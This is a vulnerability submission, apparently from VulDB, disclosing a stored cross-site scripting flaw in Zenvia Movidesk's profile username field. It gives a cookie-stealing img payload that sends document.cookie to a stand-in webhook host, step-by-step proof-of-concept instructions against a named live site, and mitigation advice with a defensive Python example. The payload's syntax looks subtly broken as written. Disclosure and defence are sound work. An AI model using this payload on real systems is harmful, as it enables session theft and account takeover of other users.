Submission #486023: zenvia movidesk 25.01.15.86c796efe6 Cross Site Scripting

Title: zenvia movidesk 25.01.15.86c796efe6 Cross Site Scripting
Description:

Vulnerability Summary
A stored XSS vulnerability was identified in Zenvia's Movidesk system. The flaw occurs in the username field, allowing the injection of malicious code. When an attacker changes the profile name to contain an XSS payload, the code is stored in the system and executed automatically when other users access the ticket viewing page, enabling a zero-click Account Takeover (ATO) attack.

Vulnerability Details
Vulnerable endpoint (profile editing): https://service.sigmatelecom.com.br/Account/EditProfile
Endpoint where the XSS is triggered (ticket view): https://service.sigmatelecom.com.br/Ticket
Payload used: <img src="https://your-webhook.com/?cookie=" + `${document.cookie}`>

Impact
- Automatic execution of malicious code upon viewing tickets;
- Theft of session cookies, enabling Account Takeover without user interaction (0-click);
- Compromise of accounts with access to ticket data;
- Privilege escalation if the attacker gains access to administrator credentials.

Recommendations
To mitigate this vulnerability, it is recommended to:
- Input sanitization: Implement strict filtering and validation of user input in the "Username" field.
- Output escaping: Ensure that all displayed data is properly escaped to prevent code execution.
- HttpOnly cookies: Configure session cookies with the HttpOnly flag to prevent JavaScript access.
- Content Security Policy (CSP): Implement a restrictive CSP to mitigate unauthorized code execution.
- Security audits: Conduct regular security testing to identify similar vulnerabilities.

Proof of Concept (PoC)
1. Access the profile editing endpoint: https://service.sigmatelecom.com.br/Account/EditProfile
2. Change the username to the following payload: <img src="https://your-webhook.com/?cookie=" + `${document.cookie}`>
3. Save the changes.
4. Access the ticket page: https://service.sigmatelecom.com.br/Ticket
5. Observe that the payload is executed and cookies are sent to the webhook.
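As an added example (not code from this submission or from Movidesk), the following Python applies the first four recommendations at the two points the report names: validating the username when the profile is saved, escaping it where the ticket page renders it, and sending HttpOnly and CSP headers. The username policy, the cookie name and the CSP values are assumptions; the advisory's own payload is used only as a constructed test input.

```python
import html
import re

# Constructed sample: the payload quoted in the advisory above, used here
# purely as input to check that the defensive controls neutralise it.
ADVISORY_PAYLOAD = '<img src="https://your-webhook.com/?cookie=" + `${document.cookie}`>'

# Recommendation 1: input validation for the "Username" field on /Account/EditProfile.
# Assumed policy (not Movidesk's own): word characters, spaces, dots, apostrophes
# and hyphens, 1-64 characters. Markup characters such as < > " ` are rejected.
_USERNAME_RE = re.compile(r"[\w .'\-]{1,64}")

def is_valid_username(name: str) -> bool:
    return _USERNAME_RE.fullmatch(name) is not None

# Recommendation 2: output escaping at the point where the ticket view
# interpolates the author's name into HTML. quote=True also escapes " and ',
# so the value stays inert inside attribute values as well as text nodes.
def render_ticket_author(username: str) -> str:
    return f'<span class="author">{html.escape(username, quote=True)}</span>'

# Recommendation 3: session cookie unreadable from JavaScript (HttpOnly),
# plus Secure and SameSite. The cookie name "session" is a placeholder.
def session_cookie_header(session_id: str) -> str:
    return f"Set-Cookie: session={session_id}; HttpOnly; Secure; SameSite=Lax; Path=/"

# Recommendation 4: restrictive CSP. With img-src limited to 'self', an injected
# <img src="https://..."> to a third-party host is blocked by the browser even
# if escaping were ever missed; script-src 'self' forbids inline script.
def csp_header() -> str:
    return ("Content-Security-Policy: default-src 'self'; script-src 'self'; "
            "img-src 'self'; object-src 'none'; base-uri 'self'")

if __name__ == "__main__":
    print("payload accepted as username:", is_valid_username(ADVISORY_PAYLOAD))
    print(render_ticket_author(ADVISORY_PAYLOAD))
    print(session_cookie_header("EXAMPLE-SESSION-ID"))
    print(csp_header())
```

Escaped output contains `&lt;img` and `&quot;` rather than a live tag, so the browser renders the stored name as text instead of fetching the attacker's URL.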
Source: https://service.sigmatelecom.com.br/Ticket
User: y4g0 (UID 80480)
Submitted: 21/01/2025 01:15 AM (1 year ago)
Moderation: 02/02/2025 08:54 AM (12 days later)
Status: Approved
VulDB Entry: 294362 [Zenvia Movidesk up to 25.01.22 Profile Editing /Account/EditProfile Username cross site scripting]
Points: 17
